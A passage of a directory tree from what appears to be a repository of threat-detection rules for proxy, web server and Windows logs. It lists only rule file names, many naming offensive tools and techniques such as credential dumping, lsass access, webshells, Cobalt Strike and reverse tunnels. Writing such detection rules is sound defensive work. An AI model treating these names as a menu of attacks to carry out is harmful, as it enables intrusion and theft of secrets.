proxy_ua_cryptominer.yml │ │ │ ├── proxy_ua_empty.yml │ │ │ ├── proxy_ua_frameworks.yml │ │ │ ├── proxy_ua_hacktool.yml │ │ │ ├── proxy_ua_malware.yml │ │ │ ├── proxy_ua_powershell.yml │ │ │ ├── proxy_ua_rclone.yml │ │ │ ├── proxy_ua_susp.yml │ │ │ ├── proxy_ua_susp_base64.yml │ │ │ └── proxy_webdav_external_execution.yml │ │ └── webserver_generic/ │ │ ├── web_f5_tm_utility_bash_api_request.yml │ │ ├── web_iis_tilt_shortname_scan.yml │ │ ├── web_java_payload_in_access_logs.yml │ │ ├── web_jndi_exploit.yml │ │ ├── web_path_traversal_exploitation_attempt.yml │ │ ├── web_source_code_enumeration.yml │ │ ├── web_sql_injection_in_access_logs.yml │ │ ├── web_ssti_in_access_logs.yml │ │ ├── web_susp_useragents.yml │ │ ├── web_susp_windows_path_uri.yml │ │ ├── web_webshell_regeorg.yml │ │ ├── web_win_webshells_in_access_logs.yml │ │ └── web_xss_in_access_logs.yml │ └── windows/ │ ├── builtin/ │ │ ├── application/ │ │ │ ├── Other/ │ │ │ │ └── win_av_relevant_match.yml │ │ │ ├── application_error/ │ │ │ │ ├── win_application_error_lsass_crash.yml │ │ │ │ └── win_application_error_msmpeng_crash.yml │ │ │ ├── esent/ │ │ │ │ ├── win_esent_ntdsutil_abuse.yml │ │ │ │ └── win_esent_ntdsutil_abuse_susp_location.yml │ │ │ ├── microsoft-windows_audit_cve/ │ │ │ │ └── win_audit_cve.yml │ │ │ ├── microsoft_windows_backup/ │ │ │ │ └── win_susp_backup_delete.yml │ │ │ ├── microsoft_windows_software_restriction_policies/ │ │ │ │ └── win_software_restriction_policies_block.yml │ │ │ ├── msiinstaller/ │ │ │ │ ├── win_builtin_remove_application.yml │ │ │ │ ├── win_msi_install_from_susp_locations.yml │ │ │ │ ├── win_msi_install_from_web.yml │ │ │ │ └── win_software_atera_rmm_agent_install.yml │ │ │ ├── mssqlserver/ │ │ │ │ ├── win_mssql_add_sysadmin_account.yml │ │ │ │ ├── win_mssql_destructive_query.yml │ │ │ │ ├── win_mssql_disable_audit_settings.yml │ │ │ │ ├── win_mssql_failed_logon.yml │ │ │ │ ├── win_mssql_failed_logon_from_external_network.yml │ │ │ │ ├── win_mssql_sp_procoption_set.yml 
│ │ │ │ ├── win_mssql_xp_cmdshell_audit_log.yml │ │ │ │ └── win_mssql_xp_cmdshell_change.yml │ │ │ ├── screenconnect/ │ │ │ │ ├── win_app_remote_access_tools_screenconnect_command_exec.yml │ │ │ │ └── win_app_remote_access_tools_screenconnect_file_transfer.yml │ │ │ └── windows_error_reporting/ │ │ │ └── win_application_msmpeng_crash_wer.yml │ │ ├── applocker/ │ │ │ └── win_applocker_application_was_prevented_from_running.yml │ │ ├── appmodel_runtime/ │ │ │ └── win_appmodel_runtime_sysinternals_tools_appx_execution.yml │ │ ├── appxdeployment_server/ │ │ │ ├── win_appxdeployment_server_applocker_block.yml │ │ │ ├── win_appxdeployment_server_appx_downloaded_from_file_sharing_domains.yml │ │ │ ├── win_appxdeployment_server_appx_package_deployment_failed_signing_requirements.yml │ │ │ ├── win_appxdeployment_server_appx_package_in_staging_directory.yml │ │ │ ├── win_appxdeployment_server_mal_appx_names.yml │ │ │ ├── win_appxdeployment_server_policy_block.yml │ │ │ ├── win_appxdeployment_server_uncommon_package_locations.yml │ │ │ ├── win_appxpackaging_server_full_trust_package_installation.yml │ │ │ └── win_appxpackaging_server_unsigned_package_installation.yml │ │ ├── appxpackaging_om/ │ │ │ └── win_appxpackaging_om_sups_appx_signature.yml │ │ ├── bits_client/ │ │ │ ├── win_bits_client_new_job_via_bitsadmin.yml │ │ │ ├── win_bits_client_new_job_via_powershell.yml │ │ │ ├── win_bits_client_new_transfer_saving_susp_extensions.yml │ │ │ ├── win_bits_client_new_transfer_via_file_sharing_domains.yml │ │ │ ├── win_bits_client_new_transfer_via_ip_address.yml │ │ │ ├── win_bits_client_new_transfer_via_uncommon_tld.yml │ │ │ └── win_bits_client_new_trasnfer_susp_local_folder.yml │ │ ├── capi2/ │ │ │ └── win_capi2_acquire_certificate_private_key.yml │ │ ├── certificate_services_client_lifecycle_system/ │ │ │ └── win_certificateservicesclient_lifecycle_system_cert_exported.yml │ │ ├── code_integrity/ │ │ │ ├── win_codeintegrity_attempted_dll_load.yml │ │ │ ├── 
win_codeintegrity_blocked_protected_process_file.yml │ │ │ ├── win_codeintegrity_enforced_policy_block.yml │ │ │ ├── win_codeintegrity_revoked_driver_blocked.yml │ │ │ ├── win_codeintegrity_revoked_driver_loaded.yml │ │ │ ├── win_codeintegrity_revoked_image_blocked.yml │ │ │ ├── win_codeintegrity_revoked_image_loaded.yml │ │ │ ├── win_codeintegrity_unsigned_driver_loaded.yml │ │ │ ├── win_codeintegrity_unsigned_image_loaded.yml │ │ │ └── win_codeintegrity_whql_failure.yml │ │ ├── diagnosis/ │ │ │ └── scripted/ │ │ │ └── win_diagnosis_scripted_load_remote_diagcab.yml │ │ ├── dns_client/ │ │ │ ├── win_dns_client_anonymfiles_com.yml │ │ │ ├── win_dns_client_mal_cobaltstrike.yml │ │ │ ├── win_dns_client_mega_nz.yml │ │ │ ├── win_dns_client_put_io.yml │ │ │ ├── win_dns_client_tor_onion.yml │ │ │ └── win_dns_client_ufile_io.yml │ │ ├── dns_server/ │ │ │ ├── win_dns_server_failed_dns_zone_transfer.yml │ │ │ └── win_dns_server_susp_server_level_plugin_dll.yml │ │ ├── driverframeworks/ │ │ │ └── win_usb_device_plugged.yml │ │ ├── firewall_as/ │ │ │ ├── win_firewall_as_add_rule.yml │ │ │ ├── win_firewall_as_add_rule_susp_folder.yml │ │ │ ├── win_firewall_as_add_rule_wmiprvse.yml │ │ │ ├── win_firewall_as_delete_all_rules.yml │ │ │ ├── win_firewall_as_delete_rule.yml │ │ │ ├── win_firewall_as_failed_load_gpo.yml │ │ │ ├── win_firewall_as_reset_config.yml │ │ │ └── win_firewall_as_setting_change.yml │ │ ├── iis-configuration/ │ │ │ ├── win_iis_logging_etw_disabled.yml │ │ │ ├── win_iis_logging_http_disabled.yml │ │ │ ├── win_iis_module_added.yml │ │ │ └── win_iis_module_removed.yml │ │ ├── ldap/ │ │ │ └── win_ldap_recon.yml │ │ ├── lsa_server/ │ │ │ └── win_lsa_server_normal_user_admin.yml │ │ ├── msexchange/ │ │ │ ├── win_exchange_proxylogon_oabvirtualdir.yml │ │ │ ├── win_exchange_proxyshell_certificate_generation.yml │ │ │ ├── win_exchange_proxyshell_mailbox_export.yml │ │ │ ├── win_exchange_proxyshell_remove_mailbox_export.yml │ │ │ ├── 
win_exchange_set_oabvirtualdirectory_externalurl.yml │ │ │ ├── win_exchange_transportagent.yml │ │ │ └── win_exchange_transportagent_failed.yml │ │ ├── ntlm/ │ │ │ ├── win_susp_ntlm_auth.yml │ │ │ ├── win_susp_ntlm_brute_force.yml │ │ │ └── win_susp_ntlm_rdp.yml │ │ ├── openssh/ │ │ │ └── win_sshd_openssh_server_listening_on_socket.yml │ │ ├── security/ │ │ │ ├── account_management/ │ │ │ │ ├── win_security_access_token_abuse.yml │ │ │ │ ├── win_security_admin_rdp_login.yml │ │ │ │ ├── win_security_diagtrack_eop_default_login_username.yml │ │ │ │ ├── win_security_member_added_security_enabled_global_group.yml │ │ │ │ ├── win_security_member_removed_security_enabled_global_group.yml │ │ │ │ ├── win_security_overpass_the_hash.yml │ │ │ │ ├── win_security_pass_the_hash_2.yml │ │ │ │ ├── win_security_rdp_localhost_login.yml │ │ │ │ ├── win_security_security_enabled_global_group_deleted.yml │ │ │ │ ├── win_security_successful_external_remote_rdp_login.yml │ │ │ │ ├── win_security_successful_external_remote_smb_login.yml │ │ │ │ ├── win_security_susp_failed_logon_source.yml │ │ │ │ ├── win_security_susp_logon_newcredentials.yml │ │ │ │ ├── win_security_susp_privesc_kerberos_relay_over_ldap.yml │ │ │ │ ├── win_security_susp_rottenpotato.yml │ │ │ │ └── win_security_susp_wmi_login.yml │ │ │ ├── object_access/ │ │ │ │ └── win_security_wfp_endpoint_agent_blocked.yml │ │ │ ├── win_security_aadhealth_mon_agent_regkey_access.yml │ │ │ ├── win_security_aadhealth_svc_agent_regkey_access.yml │ │ │ ├── win_security_account_backdoor_dcsync_rights.yml │ │ │ ├── win_security_account_discovery.yml │ │ │ ├── win_security_ad_object_writedac_access.yml │ │ │ ├── win_security_ad_replication_non_machine_account.yml │ │ │ ├── win_security_ad_user_enumeration.yml │ │ │ ├── win_security_adcs_certificate_template_configuration_vulnerability.yml │ │ │ ├── win_security_adcs_certificate_template_configuration_vulnerability_eku.yml │ │ │ ├── win_security_add_remove_computer.yml │ │ │ ├── 
win_security_admin_share_access.yml │ │ │ ├── win_security_alert_active_directory_user_control.yml │ │ │ ├── win_security_alert_ad_user_backdoors.yml │ │ │ ├── win_security_alert_enable_weak_encryption.yml │ │ │ ├── win_security_alert_ruler.yml │ │ │ ├── win_security_atsvc_task.yml │ │ │ ├── win_security_audit_log_cleared.yml │ │ │ ├── win_security_camera_microphone_access.yml │ │ │ ├── win_security_cobaltstrike_service_installs.yml │ │ │ ├── win_security_codeintegrity_check_failure.yml │ │ │ ├── win_security_dce_rpc_smb_spoolss_named_pipe.yml │ │ │ ├── win_security_dcom_iertutil_dll_hijack.yml │ │ │ ├── win_security_dcsync.yml │ │ │ ├── win_security_default_domain_gpo_modification.yml │ │ │ ├── win_security_device_installation_blocked.yml │ │ │ ├── win_security_disable_event_auditing.yml │ │ │ ├── win_security_disable_event_auditing_critical.yml │ │ │ ├── win_security_dot_net_etw_tamper.yml │ │ │ ├── win_security_dpapi_domain_backupkey_extraction.yml │ │ │ ├── win_security_dpapi_domain_masterkey_backup_attempt.yml │ │ │ ├── win_security_external_device.yml │ │ │ ├── win_security_gpo_scheduledtasks.yml │ │ │ ├── win_security_hidden_user_creation.yml │ │ │ ├── win_security_hktl_edr_silencer.yml │ │ │ ├── win_security_hktl_nofilter.yml │ │ │ ├── win_security_hybridconnectionmgr_svc_installation.yml │ │ │ ├── win_security_impacket_psexec.yml │ │ │ ├── win_security_impacket_secretdump.yml │ │ │ ├── win_security_invoke_obfuscation_clip_services_security.yml │ │ │ ├── win_security_invoke_obfuscation_obfuscated_iex_services_security.yml │ │ │ ├── win_security_invoke_obfuscation_stdin_services_security.yml │ │ │ ├── win_security_invoke_obfuscation_var_services_security.yml │ │ │ ├── win_security_invoke_obfuscation_via_compress_services_security.yml │ │ │ ├── win_security_invoke_obfuscation_via_rundll_services_security.yml │ │ │ ├── win_security_invoke_obfuscation_via_stdin_services_security.yml │ │ │ ├── win_security_invoke_obfuscation_via_use_clip_services_security.yml │ 
│ │ ├── win_security_invoke_obfuscation_via_use_mshta_services_security.yml │ │ │ ├── win_security_invoke_obfuscation_via_use_rundll32_services_security.yml │ │ │ ├── win_security_invoke_obfuscation_via_var_services_security.yml │ │ │ ├── win_security_iso_mount.yml │ │ │ ├── win_security_kerberoasting_activity.yml │ │ │ ├── win_security_kerberos_asrep_roasting.yml │ │ │ ├── win_security_kerberos_coercion_via_dns_object.yml │ │ │ ├── win_security_lm_namedpipe.yml │ │ │ ├── win_security_lsass_access_non_system_account.yml │ │ │ ├── win_security_mal_creddumper.yml │ │ │ ├── win_security_mal_wceaux_dll.yml │ │ │ ├── win_security_metasploit_authentication.yml │ │ │ ├── win_security_metasploit_or_impacket_smb_psexec_service_install.yml │ │ │ ├── win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml │ │ │ ├── win_security_net_ntlm_downgrade.yml │ │ │ ├── win_security_net_share_obj_susp_desktop_ini.yml │ │ │ ├── win_security_new_or_renamed_user_account_with_dollar_sign.yml │ │ │ ├── win_security_not_allowed_rdp_access.yml │ │ │ ├── win_security_password_policy_enumerated.yml │ │ │ ├── win_security_pcap_drivers.yml │ │ │ ├── win_security_petitpotam_network_share.yml │ │ │ ├── win_security_petitpotam_susp_tgt_request.yml │ │ │ ├── win_security_possible_dc_shadow.yml │ │ │ ├── win_security_powershell_script_installed_as_service.yml │ │ │ ├── win_security_protected_storage_service_access.yml │ │ │ ├── win_security_rdp_reverse_tunnel.yml │ │ │ ├── win_security_register_new_logon_process_by_rubeus.yml │ │ │ ├── win_security_registry_permissions_weakness_check.yml │ │ │ ├── win_security_remote_powershell_session.yml │ │ │ ├── win_security_replay_attack_detected.yml │ │ │ ├── win_security_sam_registry_hive_handle_request.yml │ │ │ ├── win_security_scm_database_handle_failure.yml │ │ │ ├── win_security_scm_database_privileged_operation.yml │ │ │ ├── win_security_sdelete_potential_secure_deletion.yml │ │ │ ├── win_security_service_install_remote_access_software.yml 
│ │ │ ├── win_security_service_installation_by_unusal_client.yml │ │ │ ├── win_security_signal_sensitive_config_access.yml │ │ │ ├── win_security_smb_file_creation_admin_shares.yml │ │ │ ├── win_security_susp_add_domain_trust.yml │ │ │ ├── win_security_susp_add_sid_history.yml │ │ │ ├── win_security_susp_computer_name.yml │ │ │ ├── win_security_susp_dsrm_password_change.yml │ │ │ ├── win_security_susp_failed_logon_reasons.yml │ │ │ ├── win_security_susp_group_policy_abuse_privilege_addition.yml │ │ │ ├── win_security_susp_group_policy_startup_script_added_to_gpo.yml │ │ │ ├── win_security_susp_kerberos_manipulation.yml │ │ │ ├── win_security_susp_ldap_dataexchange.yml │ │ │ ├── win_security_susp_local_anon_logon_created.yml │ │ │ ├── win_security_susp_logon_explicit_credentials.yml │ │ │ ├── win_security_susp_lsass_dump.yml │ │ │ ├── win_security_susp_lsass_dump_generic.yml │ │ │ ├── win_security_susp_net_recon_activity.yml │ │ │ ├── win_security_susp_opened_encrypted_zip.yml │ │ │ ├── win_security_susp_opened_encrypted_zip_filename.yml │ │ │ ├── win_security_susp_opened_encrypted_zip_outlook.yml │ │ │ ├── win_security_susp_outbound_kerberos_connection.yml │ │ │ ├── win_security_susp_possible_shadow_credentials_added.yml │ │ │ ├── win_security_susp_psexec.yml │ │ │ ├── win_security_susp_raccess_sensitive_fext.yml │ │ │ ├── win_security_susp_rc4_kerberos.yml │ │ │ ├── win_security_susp_scheduled_task_creation.yml │ │ │ ├── win_security_susp_scheduled_task_delete_or_disable.yml │ │ │ ├── win_security_susp_scheduled_task_update.yml │ │ │ ├── win_security_susp_time_modification.yml │ │ │ ├── win_security_svcctl_remote_service.yml │ │ │ ├── win_security_syskey_registry_access.yml │ │ │ ├── win_security_sysmon_channel_reference_deletion.yml │ │ │ ├── win_security_tap_driver_installation.yml │ │ │ ├── win_security_teams_suspicious_objectaccess.yml │ │ │ ├── win_security_transf_files_with_cred_data_via_network_shares.yml │ │ │ ├── 
win_security_user_added_to_local_administrators.yml │ │ │ ├── win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml │ │ │ ├── win_security_user_creation.yml │ │ │ ├── win_security_user_driver_loaded.yml │ │ │ ├── win_security_user_logoff.yml │ │ │ ├── win_security_vssaudit_secevent_source_registration.yml │ │ │ ├── win_security_windows_defender_exclusions_registry_modified.yml │ │ │ ├── win_security_windows_defender_exclusions_write_access.yml │ │ │ ├── win_security_wmi_persistence.yml │ │ │ ├── win_security_wmiprvse_wbemcomn_dll_hijack.yml │ │ │ └── win_security_workstation_was_locked.yml │ │ ├── security_mitigations/ │ │ │ ├── win_security_mitigations_defender_load_unsigned_dll.yml │ │ │ └── win_security_mitigations_unsigned_dll_from_susp_location.yml │ │ ├── servicebus/ │ │ │ └── win_hybridconnectionmgr_svc_running.yml │ │ ├── shell_core/ │ │ │ └── win_shell_core_susp_packages_installed.yml │ │ ├── smbclient/ │ │ │ └── security/ │ │ │ └── win_smbclient_security_susp_failed_guest_logon.yml │ │ ├── smbserver/ │ │ │ └── connectivity/ │ │ │ └── win_smbserver_connectivity_unsigned_and_unencrypted_share_connection.yml │ │ ├── system/ │ │ │ ├── application_popup/ │ │ │ │ └── win_system_application_sysmon_crash.yml │ │ │ ├── lsasrv/ │ │ │ │ └── win_system_lsasrv_ntlmv1.yml │ │ │ ├── microsoft_windows_Iphlpsvc/ │ │ │ │ └── win_system_isatap_router_address_set.yml │ │ │ ├── microsoft_windows_certification_authority/ │ │ │ │ └── win_system_adcs_enrollment_request_denied.yml │ │ │ ├── microsoft_windows_dhcp_server/ │ │ │ │ ├── win_system_susp_dhcp_config.yml │ │ │ │ └── win_system_susp_dhcp_config_failed.yml │ │ │ ├── microsoft_windows_distributed_com/ │ │ │ │ └── win_system_lpe_indicators_tabtip.yml │ │ │ ├── microsoft_windows_eventlog/ │ │ │ │ ├── win_system_eventlog_cleared.yml │ │ │ │ └── win_system_susp_eventlog_cleared.yml │ │ │ ├── microsoft_windows_kerberos_key_distribution_center/ │ │ │ │ ├── win_system_kdcsvc_cert_use_no_strong_mapping.yml │ │ │ 
│ └── win_system_kdcsvc_tgs_no_suitable_encryption_key_found.yml │ │ │ ├── microsoft_windows_kernel_general/ │ │ │ │ └── win_system_susp_critical_hive_location_access_bits_cleared.yml │ │ │ ├── microsoft_windows_ntfs/ │ │ │ │ └── win_system_volume_shadow_copy_mount.yml │ │ │ ├── microsoft_windows_wer_systemerrorreporting/ │ │ │ │ └── win_system_crash_dump_created.yml │ │ │ ├── microsoft_windows_windows_update_client/ │ │ │ │ └── win_system_susp_system_update_error.yml │ │ │ ├── netlogon/ │ │ │ │ ├── win_system_possible_zerologon_exploitation_using_wellknown_tools.yml │ │ │ │ └── win_system_vul_cve_2020_1472.yml │ │ │ ├── ntfs/ │ │ │ │ └── win_system_ntfs_vuln_exploit.yml │ │ │ └── service_control_manager/ │ │ │ ├── win_system_cobaltstrike_service_installs.yml │ │ │ ├── win_system_defender_disabled.yml │ │ │ ├── win_system_hack_smbexec.yml │ │ │ ├── win_system_invoke_obfuscation_clip_services.yml │ │ │ ├── win_system_invoke_obfuscation_obfuscated_iex_services.yml │ │ │ ├── win_system_invoke_obfuscation_stdin_services.yml │ │ │ ├── win_system_invoke_obfuscation_var_services.yml │ │ │ ├── win_system_invoke_obfuscation_via_compress_services.yml │ │ │ ├── win_system_invoke_obfuscation_via_rundll_services.yml │ │ │ ├── win_system_invoke_obfuscation_via_stdin_services.yml │ │ │ ├── win_system_invoke_obfuscation_via_use_clip_services.yml │ │ │ ├── win_system_invoke_obfuscation_via_use_mshta_services.yml │ │ │ ├── win_system_invoke_obfuscation_via_use_rundll32_services.yml │ │ │ ├── win_system_invoke_obfuscation_via_var_services.yml │ │ │ ├── win_system_krbrelayup_service_installation.yml │ │ │ ├── win_system_mal_creddumper.yml │ │ │ ├── win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml │ │ │ ├── win_system_moriya_rootkit.yml │ │ │ ├── win_system_powershell_script_installed_as_service.yml │ │ │ ├── win_system_service_install_anydesk.yml │ │ │ ├── win_system_service_install_csexecsvc.yml │ │ │ ├── win_system_service_install_hacktools.yml │ │ │ ├── 
win_system_service_install_mesh_agent.yml │ │ │ ├── win_system_service_install_netsupport_manager.yml │ │ │ ├── win_system_service_install_paexec.yml │ │ │ ├── win_system_service_install_pdqdeploy.yml │ │ │ ├── win_system_service_install_pdqdeploy_runner.yml │ │ │ ├── win_system_service_install_pua_proceshacker.yml │ │ │ ├── win_system_service_install_remcom.yml │ │ │ ├── win_system_service_install_remote_access_software.yml │ │ │ ├── win_system_service_install_remote_utilities.yml │ │ │ ├── win_system_service_install_sliver.yml │ │ │ ├── win_system_service_install_sups_unusal_client.yml │ │ │ ├── win_system_service_install_susp.yml │ │ │ ├── win_system_service_install_sysinternals_psexec.yml │ │ │ ├── win_system_service_install_tacticalrmm.yml │ │ │ ├── win_system_service_install_tap_driver.yml │ │ │ ├── win_system_service_install_uncommon.yml │ │ │ ├── win_system_service_terminated_error_generic.yml │ │ │ ├── win_system_service_terminated_error_important.yml │ │ │ ├── win_system_service_terminated_unexpectedly.yml │ │ │ ├── win_system_susp_rtcore64_service_install.yml │ │ │ ├── win_system_susp_service_installation_folder.yml │ │ │ ├── win_system_susp_service_installation_folder_pattern.yml │ │ │ └── win_system_susp_service_installation_script.yml │ │ ├── taskscheduler/ │ │ │ ├── win_taskscheduler_execution_from_susp_locations.yml │ │ │ ├── win_taskscheduler_lolbin_execution_via_task_scheduler.yml │ │ │ └── win_taskscheduler_susp_schtasks_delete.yml │ │ ├── terminalservices/ │ │ │ └── win_terminalservices_rdp_ngrok.yml │ │ ├── win_alert_mimikatz_keywords.yml │ │ ├── windefend/ │ │ │ ├── win_defender_antimalware_platform_expired.yml │ │ │ ├── win_defender_asr_lsass_access.yml │ │ │ ├── win_defender_asr_psexec_wmi.yml │ │ │ ├── win_defender_config_change_exclusion_added.yml │ │ │ ├── win_defender_config_change_exploit_guard_tamper.yml │ │ │ ├── win_defender_config_change_sample_submission_consent.yml │ │ │ ├── win_defender_history_delete.yml │ │ │ ├── 
win_defender_malware_and_pua_scan_disabled.yml │ │ │ ├── win_defender_malware_detected_amsi_source.yml │ │ │ ├── win_defender_real_time_protection_disabled.yml │ │ │ ├── win_defender_real_time_protection_errors.yml │ │ │ ├── win_defender_restored_quarantine_file.yml │ │ │ ├── win_defender_suspicious_features_tampering.yml │ │ │ ├── win_defender_tamper_protection_trigger.yml │ │ │ ├── win_defender_threat.yml │ │ │ └── win_defender_virus_scan_disabled.yml │ │ └── wmi/ │ │ └── win_wmi_persistence.yml │ ├── create_remote_thread/ │ │ ├── create_remote_thread_win_hktl_cactustorch.yml │ │ ├── create_remote_thread_win_hktl_cobaltstrike.yml │ │ ├── create_remote_thread_win_keepass.yml │ │ ├── create_remote_thread_win_mstsc_susp_location.yml │ │ ├── create_remote_thread_win_powershell_lsass.yml │ │ ├── create_remote_thread_win_powershell_susp_targets.yml │ │ ├── create_remote_thread_win_susp_password_dumper_lsass.yml │ │ ├── create_remote_thread_win_susp_relevant_source_image.yml │ │ ├── create_remote_thread_win_susp_uncommon_source_image.yml │ │ ├── create_remote_thread_win_susp_uncommon_target_image.yml │ │ └── create_remote_thread_win_ttdinjec.yml │ ├── create_stream_hash/ │ │ ├── create_stream_hash_ads_executable.yml │ │ ├── create_stream_hash_creation_internet_file.yml │ │ ├── create_stream_hash_file_sharing_domains_download_susp_extension.yml │ │ ├── create_stream_hash_file_sharing_domains_download_unusual_extension.yml │ │ ├── create_stream_hash_hktl_generic_download.yml │ │ ├── create_stream_hash_regedit_export_to_ads.yml │ │ ├── create_stream_hash_susp_ip_domains.yml │ │ ├── create_stream_hash_winget_susp_package_source.yml │ │ └── create_stream_hash_zip_tld_download.yml │ ├── dns_query/ │ │ ├── dns_query_win_anonymfiles_com.yml │ │ ├── dns_query_win_appinstaller.yml │ │ ├── dns_query_win_cloudflared_communication.yml │ │ ├── dns_query_win_common_malware_hosting_services.yml │ │ ├── dns_query_win_devtunnels_communication.yml │ │ ├── 
dns_query_win_dns_server_discovery_via_ldap_query.yml │ │ ├── dns_query_win_domain_azurewebsites.yml │ │ ├── dns_query_win_finger.yml │ │ ├── dns_query_win_gup_query_to_uncommon_domains.yml │ │ ├── dns_query_win_hybridconnectionmgr_servicebus.yml │ │ ├── dns_query_win_kerberos_coercion_via_dns_object_spoofing.yml │ │ ├── dns_query_win_mal_cobaltstrike.yml │ │ ├── dns_query_win_mega_nz.yml │ │ ├── dns_query_win_onelaunch_update_service.yml │ │ ├── dns_query_win_quickassist.yml │ │ ├── dns_query_win_regsvr32_dns_query.yml │ │ ├── dns_query_win_remote_access_software_domains_non_browsers.yml │ │ ├── dns_query_win_susp_external_ip_lookup.yml │ │ ├── dns_query_win_teamviewer_domain_query_by_uncommon_app.yml │ │ ├── dns_query_win_tor_onion_domain_query.yml │ │ ├── dns_query_win_ufile_io_query.yml │ │ └── dns_query_win_vscode_tunnel_communication.yml │ ├── driver_load/ │ │ ├── driver_load_win_mal_drivers.yml │ │ ├── driver_load_win_mal_drivers_names.yml │ │ ├── driver_load_win_pua_process_hacker.yml │ │ ├── driver_load_win_pua_system_informer.yml │ │ ├── driver_load_win_susp_temp_use.yml │ │ ├── driver_load_win_vuln_drivers.yml │ │ ├── driver_load_win_vuln_drivers_names.yml │ │ ├── driver_load_win_vuln_hevd_driver.yml │ │ ├── driver_load_win_vuln_winring0_driver.yml │ │ └── driver_load_win_windivert.yml │ ├── file/ │ │ ├── file_access/ │ │ │ ├── file_access_win_susp_credential_manager_access.yml │ │ │ ├── file_access_win_susp_credhist.yml │ │ │ ├── file_access_win_susp_crypto_currency_wallets.yml │ │ │ ├── file_access_win_susp_dpapi_master_key_access.yml │ │ │ ├── file_access_win_susp_gpo_files.yml │ │ │ ├── file_access_win_susp_process_access_browser_cred_files.yml │ │ │ └── file_access_win_teams_sensitive_files.yml │ │ ├── file_change/ │ │ │ └── file_change_win_unusual_modification_by_dns_exe.yml │ │ ├── file_delete/ │ │ │ ├── file_delete_win_delete_backup_file.yml │ │ │ ├── file_delete_win_delete_event_log_files.yml │ │ │ ├── 
file_delete_win_delete_exchange_powershell_logs.yml │ │ │ ├── file_delete_win_delete_iis_access_logs.yml │ │ │ ├── file_delete_win_delete_own_image.yml │ │ │ ├── file_delete_win_delete_powershell_command_history.yml │ │ │ ├── file_delete_win_delete_prefetch.yml │ │ │ ├── file_delete_win_delete_teamviewer_logs.yml │ │ │ ├── file_delete_win_delete_tomcat_logs.yml │ │ │ ├── file_delete_win_sysinternals_sdelete_file_deletion.yml │ │ │ ├── file_delete_win_unusual_deletion_by_dns_exe.yml │ │ │ └── file_delete_win_zone_identifier_ads_uncommon.yml │ │ ├── file_event/ │ │ │ ├── file_event_win_adsi_cache_creation_by_uncommon_tool.yml │ │ │ ├── file_event_win_advanced_ip_scanner.yml │ │ │ ├── file_event_win_anydesk_artefact.yml │ │ │ ├── file_event_win_anydesk_writing_susp_binaries.yml │ │ │ ├── file_event_win_arcsoc_susp_file_created.yml │ │ │ ├── file_event_win_aspnet_temp_files.yml │ │ │ ├── file_event_win_bloodhound_collection.yml │ │ │ ├── file_event_win_comodo_itsm_potentially_suspicious_file_creation.yml │ │ │ ├── file_event_win_create_evtx_non_common_locations.yml │ │ │ ├── file_event_win_create_non_existent_dlls.yml │ │ │ ├── file_event_win_creation_deno.yml │ │ │ ├── file_event_win_creation_new_shim_database.yml │ │ │ ├── file_event_win_creation_scr_binary_file.yml │ │ │ ├── file_event_win_creation_system_dll_files.yml │ │ │ ├── file_event_win_creation_system_file.yml │ │ │ ├── file_event_win_creation_unquoted_service_path.yml │ │ │ ├── file_event_win_cred_dump_tools_dropped_files.yml │ │ │ ├── file_event_win_cscript_wscript_dropper.yml │ │ │ ├── file_event_win_csexec_service.yml │ │ │ ├── file_event_win_csharp_compile_artefact.yml │ │ │ ├── file_event_win_dcom_iertutil_dll_hijack.yml │ │ │ ├── file_event_win_desktop_ini_created_by_uncommon_process.yml │ │ │ ├── file_event_win_dll_sideloading_space_path.yml │ │ │ ├── file_event_win_dump_file_susp_creation.yml │ │ │ ├── file_event_win_errorhandler_persistence.yml │ │ │ ├── file_event_win_exchange_webshell_drop.yml │ 
│ │ ├── file_event_win_exchange_webshell_drop_suspicious.yml │ │ │ ├── file_event_win_gotoopener_artefact.yml │ │ │ ├── file_event_win_gup_uncommon_file_creation.yml │ │ │ ├── file_event_win_hktl_crackmapexec_indicators.yml │ │ │ ├── file_event_win_hktl_dumpert.yml │ │ │ ├── file_event_win_hktl_hivenightmare_file_exports.yml │ │ │ ├── file_event_win_hktl_inveigh_artefacts.yml │ │ │ ├── file_event_win_hktl_krbrelay_remote_ioc.yml │ │ │ ├── file_event_win_hktl_mimikatz_files.yml │ │ │ ├── file_event_win_hktl_nppspy.yml │ │ │ ├── file_event_win_hktl_powerup_dllhijacking.yml │ │ │ ├── file_event_win_hktl_quarkspw_filedump.yml │ │ │ ├── file_event_win_hktl_remote_cred_dump.yml │ │ │ ├── file_event_win_hktl_safetykatz.yml │ │ │ ├── file_event_win_impacket_file_indicators.yml │ │ │ ├── file_event_win_initial_access_dll_search_order_hijacking.yml │ │ │ ├── file_event_win_install_teamviewer_desktop.yml │ │ │ ├── file_event_win_iphlpapi_dll_sideloading.yml │ │ │ ├── file_event_win_iso_file_mount.yml │ │ │ ├── file_event_win_iso_file_recent.yml │ │ │ ├── file_event_win_lolbin_gather_network_info_script_output.yml │ │ │ ├── file_event_win_lsass_default_dump_file_names.yml │ │ │ ├── file_event_win_lsass_shtinkering.yml │ │ │ ├── file_event_win_lsass_werfault_dump.yml │ │ │ ├── file_event_win_mal_adwind.yml │ │ │ ├── file_event_win_mal_octopus_scanner.yml │ │ │ ├── file_event_win_msdt_susp_directories.yml │ │ │ ├── file_event_win_mysqld_uncommon_file_creation.yml │ │ │ ├── file_event_win_net_cli_artefact.yml │ │ │ ├── file_event_win_new_files_in_uncommon_appdata_folder.yml │ │ │ ├── file_event_win_new_scr_file.yml │ │ │ ├── file_event_win_notepad_plus_plus_persistence.yml │ │ │ ├── file_event_win_ntds_dit_creation.yml │ │ │ ├── file_event_win_ntds_dit_uncommon_parent_process.yml │ │ │ ├── file_event_win_ntds_dit_uncommon_process.yml │ │ │ ├── file_event_win_ntds_exfil_tools.yml │ │ │ ├── file_event_win_office_addin_persistence.yml │ │ │ ├── 
